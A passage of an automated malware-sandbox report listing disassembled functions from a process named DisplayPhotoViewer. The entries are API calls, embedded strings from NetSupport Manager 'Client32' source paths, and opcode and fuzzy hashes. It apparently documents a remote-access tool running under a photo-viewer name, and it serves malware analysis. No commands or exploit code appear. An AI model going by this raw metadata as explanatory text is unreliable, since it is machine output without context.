                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$_memset
                                                                                                    • String ID: 932=*128$Charset$DBCS$g
                                                                                                    • API String ID: 80812033-995648831
                                                                                                    • Opcode ID: c4e83b88a9d21f5a13e7bb1f523e8e999fcf8c9f3297d05952e5d1d0ff86c61f
                                                                                                    • Instruction ID: 0a96bfca87417c8ada69953f347151fbde549fbc0bab3e4aeca4c5d3103d50cc
                                                                                                    • Opcode Fuzzy Hash: c4e83b88a9d21f5a13e7bb1f523e8e999fcf8c9f3297d05952e5d1d0ff86c61f
                                                                                                    • Instruction Fuzzy Hash: 782149B5A006589FCBA4CF59DC84BDAF7F4EF88304F1041A9E919A7340DB31AA84CF91
                                                                                                    Function 110055A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110055DD
                                                                                                    • BeginPaint.USER32(?,?), ref: 110055E8
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100560A
                                                                                                    • EndPaint.USER32(?,?), ref: 1100562F
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110055C8
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110055C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1216912278-1557312927
                                                                                                    • Opcode ID: 59c5a246da2c833e37ef27e65802a8e01080c7fc149451a822050f1e40406b83
                                                                                                    • Instruction ID: c8a66ae0772491c75878a24b4f33e8f636d1fcb70075d762936dc97e44d483e8
                                                                                                    • Opcode Fuzzy Hash: 59c5a246da2c833e37ef27e65802a8e01080c7fc149451a822050f1e40406b83
                                                                                                    • Instruction Fuzzy Hash: 63118275A00219BFD710CBA0DC85FAEF3BDEB88704F108029F90696180EA70B9058B65
                                                                                                    Function 1100B1F0 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B200
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BE4B,?,00000000,00000002), ref: 1100B239
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BE4B,?,00000000,00000002), ref: 1100B258
                                                                                                      • Part of subcall function 1100A150: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A16E
                                                                                                      • Part of subcall function 1100A150: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A198
                                                                                                      • Part of subcall function 1100A150: GetLastError.KERNEL32 ref: 1100A1A0
                                                                                                      • Part of subcall function 1100A150: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A1B4
                                                                                                      • Part of subcall function 1100A150: CloseHandle.KERNEL32(00000000), ref: 1100A1BB
                                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE4B,?,00000000,00000002), ref: 1100B268
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,1100BE4B,?,00000000,00000002), ref: 1100B26F
                                                                                                    • _free.LIBCMT ref: 1100B278
                                                                                                    • _free.LIBCMT ref: 1100B27E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                    • String ID:
                                                                                                    • API String ID: 705253285-0
                                                                                                    • Opcode ID: a448b6a5b468520f5c06ac945e0d7f9f9bedeb588c343bd17b345fd4112d4b5b
                                                                                                    • Instruction ID: efda5ae88fc2da7faca2f30cc277d789045296955c224d09f3186955bceca893
                                                                                                    • Opcode Fuzzy Hash: a448b6a5b468520f5c06ac945e0d7f9f9bedeb588c343bd17b345fd4112d4b5b
                                                                                                    • Instruction Fuzzy Hash: 88118275900714AFE722CF60EC88BEFB7ACEB49399F004519FE2696184D774B540CB61
                                                                                                    Function 110033B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000,00002EF1), ref: 110033BD
                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033E3
                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003412
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                    • API String ID: 468487828-934300333
                                                                                                    • Opcode ID: a7c7fa1de35538fd2f83be269612ef1d0b4ac5d08e0194d9da78059d0a57efc5
                                                                                                    • Instruction ID: b9013a0c5485eaf290ecb12d5bac901604756f7166deba595469b253af1fc07b
                                                                                                    • Opcode Fuzzy Hash: a7c7fa1de35538fd2f83be269612ef1d0b4ac5d08e0194d9da78059d0a57efc5
                                                                                                    • Instruction Fuzzy Hash: 5BF0273EF80516A3C21321657C09F8FBB45CBC15A9F028070FC05BA280FA60A00102F1
                                                                                                    Function 110032C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000,00002EFD), ref: 110032CD
                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110032F3
                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003322
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                    • API String ID: 468487828-934300333
                                                                                                    • Opcode ID: 0c0b819104468051b97b845aed522bf093c96daca278a839de5e1e095f038939
                                                                                                    • Instruction ID: 46577978f1fd68d5d515d7584098630fac0471237484e227464067d16d2ca538
                                                                                                    • Opcode Fuzzy Hash: 0c0b819104468051b97b845aed522bf093c96daca278a839de5e1e095f038939
                                                                                                    • Instruction Fuzzy Hash: 18F0273EE8051762C21311A57C09F8FB7558BC16B9F018070FC04B6281FA20A00102B1
                                                                                                    Function 110B3410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 110B3434
                                                                                                    • GetSubMenu.USER32(00000000,00000002), ref: 110B343D
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 110B3446
                                                                                                    • DeleteMenu.USER32(00000000,00000000,00000400,00000000,00000000,?,?,?,110B8052,75BF7C34,?), ref: 110B3468
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110B3423
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110B341E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CountDeleteErrorExitItemLastMessageProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2484136202-1557312927
                                                                                                    • Opcode ID: 3c4fa61c2b68bf18f3a9617eb3565cce4145525c118d98312a2ec74467346e74
                                                                                                    • Instruction ID: f96e25c28d527b2030e37b8e26f843b55f324d37b9ff3b88f41279fb98b9262e
                                                                                                    • Opcode Fuzzy Hash: 3c4fa61c2b68bf18f3a9617eb3565cce4145525c118d98312a2ec74467346e74
                                                                                                    • Instruction Fuzzy Hash: B5F0273AE446206BD2129E64AC89F49F398BB8521CF108861FE12EA180EB746801476D
                                                                                                    Function 10702F50 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 221sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • *TwoChannelConnect, xrefs: 10702F91
                                                                                                    • hCapiInst, xrefs: 10702F74
                                                                                                    • CapiDial called, number=%s, TwoChannelConnect=%d, xrefs: 10702FA0
                                                                                                    • CapiDial complete, connect_result [0]=%x, connect_result [1]=%x, xrefs: 107031EA
                                                                                                    • E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C, xrefs: 10702F6F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: *TwoChannelConnect$CapiDial called, number=%s, TwoChannelConnect=%d$CapiDial complete, connect_result [0]=%x, connect_result [1]=%x$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$hCapiInst
                                                                                                    • API String ID: 3472027048-1297792176
                                                                                                    • Opcode ID: c69f9597aa2251ee072ab695572ef35a13d8a002b09eaa9db92da165d7d4e154
                                                                                                    • Instruction ID: c1c9d4069aaf8c730e21f38efe550198b2eff1e01f52231b13efa626c30eccaf
                                                                                                    • Opcode Fuzzy Hash: c69f9597aa2251ee072ab695572ef35a13d8a002b09eaa9db92da165d7d4e154
                                                                                                    • Instruction Fuzzy Hash: 0B7157756021D98BE710CFACEC80B997BD5FF5A250F14C3B9F88997AD1DA304E428B61
                                                                                                    Function 1070DA5E Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStringTypeW.KERNEL32(00000001,10710274,00000001,1070AA72,?,00000100,00000000,1070AA72,00000001,?,00000100,?,00000000,00000000), ref: 1070DA9D
                                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,10710270,00000001,?), ref: 1070DAB7
                                                                                                    • GetStringTypeW.KERNEL32(00000000,?,00000100,?,?,00000100,00000000,1070AA72,00000001,?,00000100,?,00000000,00000000), ref: 1070DADE
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000220,?,00000100,00000000,00000000,00000000,00000000,?,00000100,00000000,1070AA72,00000001,?,00000100,?), ref: 1070DB11
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 1070DB7A
                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?), ref: 1070DBE5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852931651-0
                                                                                                    • Opcode ID: b3b5ee46c98b49ad42281d43a0dcbaa6b66ee722b16613a763a07c024fd5cb1b
                                                                                                    • Instruction ID: cf783211f3776805ac144a929ca95863e5559b383a0f9c187652e5c5a18f75a7
                                                                                                    • Opcode Fuzzy Hash: b3b5ee46c98b49ad42281d43a0dcbaa6b66ee722b16613a763a07c024fd5cb1b
                                                                                                    • Instruction Fuzzy Hash: 13515A71A00319EFDB229F98CC89A9FBFB4FB4A750F108619F510A2194D3709991DBA0
                                                                                                    Function 1070919B Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStringTypeW.KERNEL32(00000001,10710274,00000001,?,74DEE860,10723E48,?,?,00000002,00000000,?,?,10704A40,?), ref: 107091DA
                                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,10710270,00000001,?,?,?,10704A40,?), ref: 107091F4
                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,74DEE860,10723E48,?,?,00000002,00000000,?,?,10704A40,?), ref: 10709228
                                                                                                    • MultiByteToWideChar.KERNEL32(?,10723E49,?,00000000,00000000,00000000,74DEE860,10723E48,?,?,00000002,00000000,?,?,10704A40,?), ref: 10709260
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 107092B6
                                                                                                    • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 107092C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852931651-0
                                                                                                    • Opcode ID: 30fc01270a3abbcfb70f884a820b4b9877740a0ddb67db40c1db4654fb035b56
                                                                                                    • Instruction ID: 5eaf57bb4d7bad166b3e664ca775d0a8d47d3e3b64daa3f2e3aa016fbf969f31
                                                                                                    • Opcode Fuzzy Hash: 30fc01270a3abbcfb70f884a820b4b9877740a0ddb67db40c1db4654fb035b56
                                                                                                    • Instruction Fuzzy Hash: F0415972A0021AFFCB118FA4CC89EDE7BB8FB0A750F108625F911E61A4D3759950DBE0
                                                                                                    Function 1103F440 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 1103F4E5
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • Written %u bytes to smartcard device, xrefs: 1103F4D6
                                                                                                    • Error %d writing to smartcard device, xrefs: 1103F4EC
                                                                                                    • NO VALID SMARTCARD DEVICE!!!, xrefs: 1103F4FB
                                                                                                    • CLTCONN.CPP, xrefs: 1103F4C0
                                                                                                    • transferred == datalen, xrefs: 1103F4C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                                                                    • String ID: CLTCONN.CPP$Error %d writing to smartcard device$NO VALID SMARTCARD DEVICE!!!$Written %u bytes to smartcard device$transferred == datalen
                                                                                                    • API String ID: 73808336-3603962039
                                                                                                    • Opcode ID: 026eac08d3d47c65733b0a11513d21157319761bd4aef06d5eeb67f15cea7c04
                                                                                                    • Instruction ID: 6850c08d80bef832d9d96e9b64f2b7ad70ab8db26dbd1ba0f3b9449ed812c6cc
                                                                                                    • Opcode Fuzzy Hash: 026eac08d3d47c65733b0a11513d21157319761bd4aef06d5eeb67f15cea7c04
                                                                                                    • Instruction Fuzzy Hash: 0621F5B5905509ABDB00CF95DC41FDEB764EB91725F004269FC6467380DB307A44CAA2
                                                                                                    Function 10705FC4 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10705FFC
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10706007
                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10706014
                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,10705CC9,10705D1D,?,?,?), ref: 10706030
                                                                                                    • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,?,10705CC9,10705D1D,?,?,?), ref: 10706051
                                                                                                    • HeapDestroy.KERNEL32(?,?,10705CC9,10705D1D,?,?,?), ref: 10706063
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
